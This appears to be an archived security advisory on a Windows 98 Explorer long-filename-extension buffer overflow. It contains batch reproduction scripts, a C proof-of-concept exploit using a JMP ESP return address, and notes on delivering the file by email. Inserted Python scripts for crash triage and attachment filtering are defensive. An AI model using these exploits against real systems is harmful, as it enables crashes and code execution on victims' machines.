COMMAND
kernel (explorer.exe)
SYSTEMS AFFECTED
MS Windows '95/'98/SE
PROBLEM
The following is based on a Securax Security Advisory. It is not known
exactly what causes Explorer to crash. A buffer overflow in explorer.exe
is suspected, but in some cases other programs (that do not use
explorer.exe) have been observed to crash too.
When Windows Explorer tries to parse a filename whose extension is
longer than 129 characters, a buffer overflows and you get this error:
EXPLORER caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
Bytes at CS:EIP:
Stack dump:
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161
As you can see, EIP was overwritten during this overflow, which means
code placed in the filename could be executed. 247 + 129 + 118 bytes
are available to store data for shellcode.
If you add some extra special characters to the filename, you can
cause the file to be recognized as write-only in Windows (and not found
at all in DOS). Such a file cannot be removed unless you write directly
to the FAT, which would make a virus using it invulnerable to AV tools.
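The fault dialog quoted above is the first artifact an analyst gets from an affected machine, and its registers already tell the story: 0x61616161 is "aaaa", so the instruction pointer was loaded from the filler in the filename. The following Python script is an added example, not part of the Securax advisory: it parses the text of a Windows 9x "invalid page fault" dialog and flags every watched register whose four bytes are all printable ASCII, the signature of a register filled from user-supplied string data. The regular expressions, function names and the choice of watched registers are assumptions; the two dumps embedded in it are the explorer.exe and Eudora dialogs quoted in this advisory.

```python
import re

# Both dumps are the fault dialogs quoted in this advisory (explorer.exe and Eudora).
EXPLORER_DUMP = """EXPLORER caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
"""

EUDORA_DUMP = """EUDORA caused an invalid page fault in
module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
ECX=006a305c DS=018f ESI=007f07a8 FS=582f
EDX=007eff8c ES=018f EDI=8173b024 GS=0000
"""

# "NAME=hex" pairs as the Win9x fault dialog prints them (assumed format).
REG_RE = re.compile(r"\b(E[A-Z]{2}|[CDEFGS]S|EFLGS)=([0-9A-Fa-f]{4,8})\b")
MODULE_RE = re.compile(r"module (\S+) at ([0-9A-Fa-f]{4}):([0-9A-Fa-f]{8})")


def parse_registers(dump: str) -> dict:
    """Return {register name: integer value} for every NAME=hex pair in the dump."""
    return {name: int(value, 16) for name, value in REG_RE.findall(dump)}


def faulting_module(dump: str):
    """Return (module name, CS:EIP offset) from the 'module X at seg:off.' line."""
    m = MODULE_RE.search(dump)
    return (m.group(1), int(m.group(3), 16)) if m else (None, None)


def looks_like_text(value: int) -> bool:
    """True when all four bytes of a 32-bit value are printable ASCII (0x20-0x7e)."""
    return all(0x20 <= (value >> shift) & 0xFF <= 0x7E for shift in (0, 8, 16, 24))


def decode_ascii(value: int) -> str:
    """Render a 32-bit little-endian value as the string it was loaded from."""
    return value.to_bytes(4, "little").decode("ascii")


def controlled_registers(dump: str, watch=("EIP", "EBP", "ESP", "EAX")) -> dict:
    """Map each watched register that holds printable ASCII to its decoded text."""
    regs = parse_registers(dump)
    return {r: decode_ascii(regs[r]) for r in watch if r in regs and looks_like_text(regs[r])}


def triage(dump: str) -> str:
    """One-line verdict an analyst can drop into a ticket."""
    module, _ = faulting_module(dump)
    eip = parse_registers(dump).get("EIP", 0)
    hits = controlled_registers(dump)
    if "EIP" in hits:
        others = ", ".join(r for r in hits if r != "EIP") or "no other register"
        return f"EIP {eip:08x} = {hits['EIP']!r}: control flow hijacked by input data (also in {others})"
    return f"fault inside {module or 'unparsed module'} at {eip:08x}; no watched register holds input data"


if __name__ == "__main__":
    for dump in (EXPLORER_DUMP, EUDORA_DUMP):
        print(triage(dump))
```

The explorer.exe dialog also reports the faulting module as <unknown> and prints nothing under "Bytes at CS:EIP:", which is consistent with EIP pointing at an unmapped address built from the filename; the Eudora dialog, by contrast, faults inside EUDORA.EXE with code bytes present, so that crash is a consequence of the corrupted state rather than a direct control-flow hijack.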
Reproduction of the problem
===========================
To create such a file, place the following code in a .bat file:
echo This will create a file that when clicked upon in windows
echo explorer or any other program that calls explorer.exe for
echo file management will cause a buffer overflow.
dir *.* > _ . ------Bufferoverflow-----------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
echo This will cause a Blue screen of death
echo Just to show you it is possible to execute remote code.
echo (all it does is overwrite the return address with a false one.)
dir *.* > _ . ------Blue-screen-of-death------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1234567890AAAAAAAAAA
or
ECHO Buffer overflow in windows98 explorer.exe
dir *.* > a.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
ECHO you can vary the amount of a's between 129 and 147 +/-.
ECHO try to vary this length, it will change results
Now run the .bat file.
The bug can also be triggered on remote computers (tested on Eudora
Pro): attach the file to an e-mail and send it to an unsuspecting
user. When he checks his e-mail and the mail program attempts to save
the attachment to disk, the program crashes due to a buffer overflow:
EUDORA caused an invalid page fault in
module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
ECX=006a305c DS=018f ESI=007f07a8 FS=582f
EDX=007eff8c ES=018f EDI=8173b024 GS=0000
Bytes at CS:EIP:
56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00
Stack dump:
Funny note: every time you try to access the directory where the
attachment should have been saved, your program will crash, even if
this program does not use Explorer for its file management. (In this
case you don't even have to click on the file or hover over it and
wait; it crashes immediately, rendering the entire directory useless.)
This is what we get in Windows Commander while trying to browse the
directory. Note that the file doesn't show up in a listing;
nevertheless, Windows Commander crashes with:
Application Error
Exception EAccessViolation in module WINCMD32.EXE at 7F8B0736
Access violation at address 7FCB1946. Read of address 00580939
Scanning this directory with ScanDisk does not report any problems.
A file with this name could be uploaded to an FTP server, placed on
an HTTP server for download, sent via DCC on IRC, and so on.
This type of attack allows any user, local or remote, with file
creation access to run hostile code on the computer. (Since e-mail
programs will attempt to write attachments to disk, almost any
Windows 98 user with an e-mail address is vulnerable.) If someone
wrote some tiny code that downloads and executes a remote trojan,
this could cause a huge problem! It could be used to gain root access
to all Windows computers. Just imagine the harm someone could cause
by sending an e-mail containing code to DDoS some server to 10.000
people.
Writing such code might be tricky, because we are dealing with a
filename, and not all byte values are accepted in a legal filename
(this could be partially circumvented by creating the filename with a
raw write to disk). Everything stated above about executing code is
purely hypothetical.
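The practical defence against the delivery vectors described above (mail attachments, FTP uploads, HTTP downloads) is to refuse such filenames at the server or gateway, before a Windows 98 client ever writes them to disk. The following Python script is an added example, not part of the advisory or of any product: it measures the extension of a filename the way Explorer sees it (everything after the last dot of the last path component, with either slash accepted as a separator) and scans a constructed MIME message for attachments whose declared filename exceeds a policy limit. The 32-character limit, the function names, the sample names and the sample message are assumptions; the advisory itself only establishes that more than 129 characters triggers the overflow, so the policy deliberately rejects well below that.

```python
import email

# Policy limit (assumed): no legitimate extension is anywhere near 32 characters,
# so we reject far below the >129 characters the advisory reports as fatal.
MAX_EXTENSION = 32


def extension_length(name: str) -> int:
    """Length of the extension as Win9x Explorer sees it: the text after the
    last '.' of the last path component (backslash or slash as separator)."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in base:
        return 0
    return len(base.rsplit(".", 1)[1])


def is_unsafe_filename(name: str, limit: int = MAX_EXTENSION) -> bool:
    """True when the extension exceeds the policy limit."""
    return extension_length(name) > limit


def unsafe_attachments(raw_message: str, limit: int = MAX_EXTENSION) -> list:
    """Return the attachment filenames in an RFC 822 message that violate the
    policy. Only the declared filename is inspected; nothing is written to disk."""
    msg = email.message_from_string(raw_message)
    return [part.get_filename() for part in msg.walk()
            if part.get_filename() and is_unsafe_filename(part.get_filename(), limit)]


# Constructed sample names modelled on the advisory's batch file (not copied from it).
CRASH_NAME_1 = "a." + "a" * 200
CRASH_NAME_2 = "_." + "-" * 6 + "Bufferoverflow" + "-" * 11 + "a" * 100

# Constructed MIME message with two hostile attachments and one harmless one.
SAMPLE_EML = (
    "From: sender@example.com\n"
    "To: user@example.com\n"
    "Subject: constructed test message\n"
    "MIME-Version: 1.0\n"
    'Content-Type: multipart/mixed; boundary="BOUNDARY"\n'
    "\n"
    "--BOUNDARY\n"
    "Content-Type: text/plain\n"
    "\n"
    "see attached\n"
    "--BOUNDARY\n"
    "Content-Type: application/octet-stream\n"
    f'Content-Disposition: attachment; filename="{CRASH_NAME_1}"\n'
    "\n"
    "xx\n"
    "--BOUNDARY\n"
    "Content-Type: text/plain\n"
    'Content-Disposition: attachment; filename="notes.txt"\n'
    "\n"
    "harmless\n"
    "--BOUNDARY\n"
    "Content-Type: application/octet-stream\n"
    f'Content-Disposition: attachment; filename="{CRASH_NAME_2}"\n'
    "\n"
    "xx\n"
    "--BOUNDARY--\n"
)

if __name__ == "__main__":
    for name in unsafe_attachments(SAMPLE_EML):
        print(f"quarantine: {extension_length(name)}-char extension in {name[:30]!r}...")
```

The same extension_length check applies unchanged to an FTP upload handler or an HTTP download directory: the advisory's point that the directory itself becomes unusable once the file exists is the reason to reject the name before creation rather than clean up afterwards.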
Laurent Eschenauer added the following. He managed to write an
exploit for the long filename extension buffer overflow. If you put
more bytes in the extension than in the batch file proposed by Zoa
Chien (see above), you can overflow such that ESP is actually
pointing to your shellcode. If you don't fill the buffer far enough,
you need to go upward in the stack to find a reference to the
extension... Does that mean there are two different buffer overflows?
Since ESP points to our code, we just need to find a JMP ESP
somewhere. Laurent used one in comctl32.dll, but he is not sure
whether its address is the same in all Win98 releases.
Anyway, he put an "int 3" in as the code to execute, to show that the
bug is exploitable. Doing more is going to be really tricky, since
only a few bytes of code are available (after the smashed EIP at the
end of the extension). One last thing: since the exploit has to be a
filename, many "bad bytes" are encountered, because not every byte
value is allowed in a filename.
More technical details are in the code: where the bytes that
overwrite EIP go, where the code should be, etc.
// Long filename extension exploit for Win 98
// Written by Laurent Eschenauer <Laurent.E@mail.com>
//
// This exploit is a follow up to Securax advisory posted on Vuln-dev scx-sa-02 by <zoachien@securax.org>
// I tested it with explorer.exe 4.72.3110.1
// In the sploit, i use a JMP ESP (FF E4) in comctl32.dll version 5.81
//
// I just stuffed an "int 3" in the shellcode, doing more is going to be tricky since
// we have a limited number of bytes for the code (about 50) and you have a lot of bad bytes
// since it has to be a filename....
//
// Have fun playing with this,
// If you do anything useful with this one, please send me a copy and share it on vuln-dev (securityfocus.com)
//
// laurent. [kooka]
#include <stdio.h>

#define PATH "d:\\exploit"   // Don't forget to change this:
                             // put the exploit in a dir so it's easy to
                             // delete it !

int main(int argc, char *argv[])
{
    char command[1024];
    char exploit[256];
    FILE *hack;
    int i;

    // let's fill the sploit !
    char flag = 'a';
    char fill = 'A';
    for (i = 0; i < 240; i += 4)   // A little trick to easily find what is where in memory.
    {
        exploit[i]   = flag;
        exploit[i+1] = fill;
        exploit[i+2] = fill + 1;
        exploit[i+3] = fill + 2;
        if (++flag == 'z')
        {
            flag = 'a';
            ++fill;
        }
    }
    exploit[240] = 0x00;   // 240 bytes is the max, at least on my config.

    // EAX - We control it, but who cares ?
    exploit[127] = (char) 0x50;
    exploit[128] = (char) 0x50;
    exploit[129] = (char) 0x50;
    exploit[130] = (char) 0x50;

    // EBP - Nothing cool to do with this one ?
    exploit[135] = (char) 0x60;
    exploit[136] = (char) 0x60;
    exploit[137] = (char) 0x60;
    exploit[138] = (char) 0x60;

    // EIP - I use a JMP ESP in comctl32.dll
    exploit[139] = (char) 0x77;
    exploit[140] = (char) 0xAD;
    exploit[141] = (char) 0xB9;
    exploit[142] = (char) 0xBF;

    // Shellcode - I didn't try anything else... work in progress
    exploit[163] = (char) 0xCC;
    exploit[164] = (char) 0xCC;
    exploit[165] = (char) 0xCC;

    // Let's do it !
    sprintf(command, "%s\\AAAA.%s", PATH, exploit);
    hack = fopen(command, "w");
    if (hack == NULL)
    {
        printf("Error creating file, sorry !\n");
    }
    else
        fclose(hack);
    // Cool, just click the file and you'll smash the stack !
    return 0;
}
Domino and Notes servers running on NT boxes hang five minutes after
receiving a message with an attachment named
1._AAAAAAAAAAAAAAA...........
Windows 95 B (4.00.950B) seems to be clean, while .....
SOLUTION
Contrary to popular belief, Windows 98 without IE fixes much of the
OS; most notably, it removes the unending slew of bugs and
vulnerabilities that IE and Outlook bring to it. Use a utility called
98Lite, which can be found at
http://www.98lite.net
and you will have systems that outperform and are more secure than
any Win98 system set up the way Microsoft would have you believe it
needs to be.